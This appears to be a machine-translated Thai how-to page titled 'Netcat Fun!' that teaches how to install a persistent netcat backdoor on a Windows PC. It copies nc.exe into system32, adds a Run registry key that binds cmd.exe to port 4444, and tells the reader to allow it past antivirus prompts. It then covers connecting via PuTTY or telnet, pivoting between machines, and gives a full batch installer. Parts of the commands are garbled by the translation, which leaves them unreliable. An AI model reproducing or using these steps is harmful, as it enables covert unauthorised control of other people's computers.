สารบัญ:

Netcat Fun!: 5 ขั้นตอน
Netcat Fun!: 5 ขั้นตอน

วีดีโอ: Netcat Fun!: 5 ขั้นตอน

วีดีโอ: Netcat Fun!: 5 ขั้นตอน
วีดีโอ: how to get remote access to your hacking targets // reverse shells with netcat (Windows and Linux!!) 2024, มิถุนายน
Anonim
เน็ตแคทสนุก!
เน็ตแคทสนุก!

คำแนะนำนี้แสดงวิธีสร้างแบ็คดอร์บนคอมพิวเตอร์ด้วย netcat! ฉันจะแสดงให้คุณเห็นสองวิธีในการทำเช่นนี้ ทั้งที่มีและไม่มีแบตช์ไฟล์ที่จะทำให้มันเป็นอัตโนมัติสำหรับคุณ คำแนะนำนี้อนุมานว่าคุณได้รับสิทธิ์รูทบนคอมพิวเตอร์แล้ว อาจมี 0phcrack LiveCD ที่นี่ ตอนนี้เข้าสู่คำสั่งสอน

ขั้นตอนที่ 1: ดาวน์โหลด Netcat

ฉันได้ช่วยคุณประหยัดเวลาในการค้นหา Google เป็นเวลา 3 นาที และได้นำ nc.exe ไปใช้ในคำแนะนำเพื่อให้คุณดาวน์โหลด คุณยังสามารถดาวน์โหลด nc.bat ซึ่งเป็นไฟล์แบตช์ที่ฉันสร้างขึ้นเพื่อทำให้กระบวนการของคุณเป็นแบบอัตโนมัติ ตรวจสอบให้แน่ใจว่าหากคุณดาวน์โหลด nc.bat ไฟล์ขนาด 464 ไบต์ เพราะฉันยังคงอัปโหลดเวอร์ชันต่างๆ และพบว่ามีบางอย่างผิดปกติ ถ้าไม่ใช่ 464 ไบต์ โปรแกรมจะไม่สอดคล้องกับคำแนะนำนี้

ขั้นตอนที่ 2: ด้วย Nc.bat

กับ Nc.bat
กับ Nc.bat

ขั้นแรก ทั้งสองไฟล์ต้องอยู่ในไดเร็กทอรีเดียวกันเพื่อให้ nc.bat ทำงานได้อย่างถูกต้อง ฉันแนะนำให้ใช้แฟลชไดรฟ์หรือซีดีรอมสำหรับการดำเนินการนี้ ฉันใช้แฟลชไดรฟ์ geek 512 เมกะไบต์สำหรับสิ่งนี้ แต่นั่นเป็นเพียงฉัน ดังนั้น ให้คัดลอกไฟล์ไปยังอุปกรณ์สื่อภายนอกของคุณ และนำไปที่คอมพิวเตอร์ที่คุณมีรูทอยู่ ไปที่อุปกรณ์สื่อและดับเบิลคลิก nc.bat การดำเนินการนี้จะคัดลอกไฟล์ nc.exe ไปยังโฟลเดอร์ system32 ในรูทของระบบ (โดยปกติคือ C:\Windows หรือ C:\WINNT) และทำการเปลี่ยนแปลงที่จำเป็นในรีจิสทรี จากนั้นจดที่อยู่ IP มันจะเป็นบางอย่างเช่น '192.168.1.103' ซึ่งเป็นของฉัน เมื่อเสร็จแล้วให้รีบูตเครื่องและเข้าสู่ระบบ จากนั้นโปรแกรมป้องกันไวรัสอาจถามคุณว่าคุณต้องการอนุญาต/ไม่อนุญาตโปรแกรมหรือไม่ คลิกที่ 'อนุญาต' หรือคล้ายกัน โปรดทราบว่าในคำแนะนำนี้ คุณสามารถ telnet จากเครือข่ายท้องถิ่นของคอมพิวเตอร์เครื่องนั้นเท่านั้น จากนั้นออกจากระบบหรือออกจากระบบหรืออะไรก็ตามที่คุณต้องการ

ขั้นตอนที่ 3: ไม่มี Nc.bat

ไม่มี Nc.bat
ไม่มี Nc.bat
ไม่มี Nc.bat
ไม่มี Nc.bat
ไม่มี Nc.bat
ไม่มี Nc.bat
ไม่มี Nc.bat
ไม่มี Nc.bat

ในการดำเนินการนี้ คุณต้องมี nc.exe ในซีดีหรือแฟลชไดรฟ์ ไปที่คอมพิวเตอร์ เข้าสู่ระบบ และเสียบแฟลชไดรฟ์หรือใส่ในซีดีของคุณ จากที่นี่ มีสองวิธี: ส่วนต่อประสานผู้ใช้แบบกราฟิกที่ขัดเกลาของ windows หรือวิธีที่สกปรกและล้าสมัยของพรอมต์คำสั่งวิธีพรอมต์คำสั่งที่ล้าสมัยและสกปรก: ดึงพรอมต์คำสั่งโดยไปที่ StartRun และพิมพ์ใน:

cmd.exeนำทางไปยังแฟลชหรือไดรฟ์ซีดีของคุณ หากคุณไม่ทราบว่าไดรฟ์ใดเป็นไดรฟ์ ให้คลิกขวาที่ปุ่มเริ่มแล้วคลิกสำรวจ คลิกที่ไดรฟ์ที่ไม่ใช่ในเครื่องทั้งหมดใน My Computer จนกว่าคุณจะมาที่แฟลชไดรฟ์/ซีดี จำตัวอักษรของไดรฟ์และกลับไปที่พรอมต์คำสั่ง พิมพ์ตัวอักษรของไดรฟ์ตามด้วยเครื่องหมายทวิภาคดังนี้: K:จากนั้นพิมพ์ทีละบรรทัดตามด้วยกดปุ่มย้อนกลับ

คัดลอก nc.exe %systemroot%\system32\nc.exereg เพิ่ม HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 - t -e cmd.exe"นั่นคือการติดตั้งที่สวยมาก สิ่งที่คุณต้องรู้ในตอนนี้คือที่อยู่ IP ในเครื่อง ซึ่งหาได้ง่ายโดยพิมพ์คำสั่ง 'ipconfig' และค้นหาบางอย่างในตาราง เช่น "192.168.1.103" จากนั้นรีบูตเครื่องและเข้าสู่ระบบใหม่ โปรแกรมป้องกันไวรัสอาจถามคุณว่าคุณต้องการอนุญาต/ไม่อนุญาตหรือไม่ คลิกอนุญาต จากนั้น คุณมีอิสระที่จะทำสิ่งที่คุณต้องการด้วยคอมพิวเตอร์ ส่วนต่อประสานกราฟิกที่ขัดเกลาของ Windows คลิกขวาบนปุ่มเริ่มต้นแล้วคลิกสำรวจ คลิกที่ไดรฟ์ที่ไม่ใช่ในเครื่องทั้งหมดใน My Computer จนกว่าคุณจะมาที่แฟลชไดรฟ์/ซีดี จากนั้นคลิกขวาที่ nc.exe แล้วคัดลอก จากนั้นไปที่ไดรฟ์ C และคลิกที่โฟลเดอร์ Windows หรือ WINNT จากนั้นไปที่โฟลเดอร์ system32 และวาง nc.exe ปิดสิ่งนั้นและไปที่ StartRun พิมพ์ regedit. นำทางผ่านโฟลเดอร์ต่างๆ ไปที่: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runจากนั้นคลิกขวาที่พื้นที่ว่างและไปที่ NewString Value พิมพ์อะไรก็ได้ที่คุณต้องการสำหรับชื่อ แต่สำหรับค่า ให้พิมพ์

%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exeนั่นคือการติดตั้งที่สวยมาก สิ่งที่คุณต้องรู้ในตอนนี้คือที่อยู่ IP ในเครื่อง ซึ่งสามารถพบได้ง่ายโดยพิมพ์คำสั่ง 'ipconfig' ลงในพรอมต์คำสั่ง (StartRun:cmd.exe) และค้นหาบางอย่างในตาราง เช่น "192.168.1.103" จากนั้นรีบูตเครื่องและเข้าสู่ระบบใหม่ โปรแกรมป้องกันไวรัสอาจถามคุณว่าคุณต้องการอนุญาต/ไม่อนุญาตหรือไม่ คลิกอนุญาต จากนั้นคุณมีอิสระที่จะทำสิ่งที่คุณต้องการด้วยคอมพิวเตอร์

ขั้นตอนที่ 4: กลับเข้าไป

เมื่อคุณติดตั้งแล้ว และต้องการควบคุมโฮสต์ ให้เปิดพรอมต์คำสั่งหรือ PuTTY ฉันคิดว่า PuTTY นั้นยอดเยี่ยม ดังนั้นฉันจะให้คุณดาวน์โหลดมันที่นี่ โดยใช้ PuTTYDownload และเปิด PuTTY.exe คลิกที่โปรโตคอล 'ดิบ' ในกล่องข้อความพอร์ต # พิมพ์ 4444 ในกล่อง 'ที่อยู่โฮสต์' พิมพ์ที่อยู่ IP ที่คุณจดไว้ระหว่างการติดตั้ง จากนั้นกด Enter PuTTY ควรเชื่อมต่อกับกล่องและคุณจะได้รับพรอมต์คำสั่ง ใช้ Command Prompt เปิดพรอมต์คำสั่งแล้วพิมพ์ 'telnet 4444' จากนั้นกด Enter และคุณควรได้รับพรอมต์คำสั่ง สิ่งนี้จะช่วยให้คุณทำเกือบทุกอย่างที่คุณต้องการกับคอมพิวเตอร์จากระยะไกลซึ่งคุณสามารถทำได้ด้วยบัญชีท้องถิ่น มันเริ่มน่าสนใจจริงๆ เมื่อคุณเข้าไปในคอมพิวเตอร์เครื่องหนึ่ง และจากนั้นไปที่คอมพิวเตอร์อีกเครื่องจากคอมพิวเตอร์เครื่องนั้น เพื่อเชื่อมต่อคอมพิวเตอร์ทั้งสายเข้าด้วยกัน ขอให้สนุก (ถูกกฎหมาย)!

ขั้นตอนที่ 5: รหัสที่มา

เนื่องจากมีคนถามฉัน ฉันจะใส่ซอร์สโค้ด (สำหรับไฟล์แบตช์) และอธิบายแต่ละคำสั่งและหน้าที่ของคำสั่ง ระวัง! นี่เป็นเวอร์ชันปัจจุบันของโปรแกรมติดตั้งแบบแบตช์ หากรหัสของคุณแตกต่างกัน รหัสจะแตกต่างกัน

@echo offcopy nc.exe %systemroot%\system32\nc.exeif errorlevel 0 ไปที่ข้อผิดพลาด regeditgoto: regeditreg เพิ่ม HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc. exe -L -d -p 4444 -t -e cmd.exe"ถ้า errorlevel 0 goto ip:errorecho มีบางสิ่งที่ไม่คาดคิดเกิดขึ้น และโปรแกรมจำเป็นต้อง exit.goto end:ipecho เขียนที่อยู่ IP จาก tableipconfig:endecho end.echo เทปพันสายไฟ out.pause@echo off- บอกว่าไม่ให้แสดงคำสั่งเมื่อดำเนินการคัดลอก nc.exe %systemroot%\system32\nc.exe- มักจะคัดลอก netcat ลงใน C:\WINDOWS\system32 ทำให้เมื่อคุณกลับเข้าไปใหม่ แทนที่จะเปลี่ยนไดเร็กทอรีตลอดเวลา คุณสามารถพิมพ์ "nc" เพื่อเปิดพอร์ตอื่นได้ ถ้า errorlevel 0 ไปที่ regedit-error กำลังตรวจสอบ หากการคัดลอกสำเร็จ จะทำการแก้ไขข้อผิดพลาด registry.goto-หากเกิดข้อผิดพลาด ให้ไปที่ป้ายกำกับ:error label.:regedit-A โดยระบุว่าเมื่อโปรแกรมแจ้งว่า "goto regedit" ให้ไปที่นี่.reg เพิ่ม HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe"- (ควรจะเป็น เป็นบรรทัดเดียว) ที่เพิ่มรีจิสตรีคีย์เพื่อรีสตาร์ทโปรแกรมเมื่อรีบูต /f หมายถึงเขียนทับคีย์ที่มีอยู่ /v สำหรับชื่อคีย์ /d สำหรับข้อมูล แท็กที่เหลือเป็นอินพุตสำหรับ netcat -L บอกให้รีสตาร์ทเมื่อออก ดังนั้นคุณจึงไม่ต้องรอให้คอมพิวเตอร์รีสตาร์ท - ฉันลืม -p 4444 ระบุพอร์ต # - ฉันลืมไป -e cmd.exe ทำให้พรอมต์คำสั่งเริ่มทำงานในการเชื่อมต่อระยะไกล หาก errorlevel 0 ไปที่การตรวจสอบข้อผิดพลาด ip หากการรันผิดพลาด มันจะข้ามบรรทัดนี้และลงไปที่:error label.echo มีบางสิ่งที่ไม่คาดคิดเกิดขึ้น และโปรแกรมจำเป็นต้องออก -บอกให้โปรแกรมพิมพ์ "มีบางสิ่งที่ไม่คาดคิดเกิดขึ้น และโปรแกรมจำเป็นต้องออก " บน screen.goto end-ถ้ามันไปที่ข้อความแสดงข้อผิดพลาดมีบางอย่างผิดพลาดและโปรแกรมจำเป็นต้องปิดต่อไป:ip-Again, label.echo เขียนที่อยู่ IP จากตาราง-เขียน "เขียน IP จากตาราง" ไปยัง screen.ipconfig-นี่คือคำสั่งที่พิมพ์ข้อมูลเกี่ยวกับการตั้งค่าเครือข่ายท้องถิ่น (LAN) ของคุณ:end-Label.echo end.-เขียน "end" ไปที่เทปกรองแสง screen.echo -เขียน "เทปพันสายไฟ" ไปที่หน้าจอหยุดชั่วคราว-คำสั่งนี้จะหยุดโปรแกรมชั่วคราวและรอให้ผู้ใช้กดปุ่ม ในโปรแกรมนี้จะรอรับข้อมูลเข้าแล้วออกจากโปรแกรม

แนะนำ:

Fun Micro:bit Robot - ง่ายและราคาไม่แพง!: 17 ขั้นตอน (พร้อมรูปภาพ)

Fun Micro:bit Robot - ง่ายและราคาไม่แพง!: 17 ขั้นตอน (พร้อมรูปภาพ)

Fun Micro:bit Robot - ง่ายและราคาไม่แพง!: BBC micro:bits เยี่ยมมาก! พวกมันตั้งโปรแกรมได้ง่าย อัดแน่นด้วยคุณสมบัติอย่าง Bluetooth และมาตรความเร่ง และราคาไม่แพง จะดีกว่าไหมที่จะสร้างรถหุ่นยนต์ที่ราคาแทบไม่มีเลย โครงการนี้ได้รับแรงบันดาลใจจาก

Fun MicroBit Dice: 6 ขั้นตอน

Fun MicroBit Dice: 6 ขั้นตอน

ลูกเต๋าไมโครบิตแสนสนุก: เฮ้! วันนี้ผมจะมาแชร์วิธีเขียนโค้ด Micro bit Dice ก่อนหน้านั้นฉันจะพูดถึงข้อมูลเล็กน้อยว่า Micro Bit คืออะไร Micro bit เป็นเทคโนโลยีที่ออกแบบโดย BBC ส่วนใหญ่ใช้สำหรับการศึกษาในสหราชอาณาจักร มันมีขนาดเล็กและสามารถบรรทุกได้ แต่สามารถ

Iron Man Reactor for Fun (จอยสติ๊ก Digital Motion Processor): 7 ขั้นตอน (พร้อมรูปภาพ)

Iron Man Reactor for Fun (จอยสติ๊ก Digital Motion Processor): 7 ขั้นตอน (พร้อมรูปภาพ)

Iron Man Reactor for Fun (จอยสติ๊ก Digital Motion Processor Joystick): สวัสดีที่รัก! นี่เป็นคำสั่งแรกของฉัน ดังนั้นหวังว่าคุณจะชอบมันและข้อเสนอแนะของคุณ! โปรเจ็กต์นี้เป็นแพลตฟอร์มแบบอินเทอร์แอคทีฟสำหรับปาร์ตี้ที่บ้าน การแข่งขัน กิจกรรม - เพื่อความสนุกสนาน นี่คือเซ็นเซอร์ตรวจจับความเคลื่อนไหวสองตัวที่ทำขึ้นในการออกแบบเครื่องปฏิกรณ์ไอรอนแมน NS

Netcat ใน Python: 6 ขั้นตอน

Netcat ใน Python: 6 ขั้นตอน

Netcat ใน Python: netcat คืออะไร? หน้าคู่มือสำหรับ netcat ระบุว่า: "ยูทิลิตี้ nc (หรือ netcat) ใช้สำหรับทุกอย่างภายใต้ดวงอาทิตย์ที่เกี่ยวข้องกับซ็อกเก็ตโดเมน TCP, UDP หรือ UNIX มันสามารถเปิดการเชื่อมต่อ TCP, ส่งแพ็กเก็ต UDP, ฟังบน arb

สนุกยิ่งขึ้นกับ Netcat!!: 4 ขั้นตอน

สนุกยิ่งขึ้นกับ Netcat!!: 4 ขั้นตอน

สนุกกว่าด้วย Netcat!!: ตอนนี้ ถ้าคุณยังไม่ได้อ่าน Duct tape's guide to Netcat Backdoors ให้อ่านที่นี่ คำแนะนำนี้จะกล่าวถึงคำสั่ง netcat พื้นฐานและวิธีใช้งาน นอกจากนี้ยังใช้คำสั่งแบทช์พื้นฐานอีกด้วย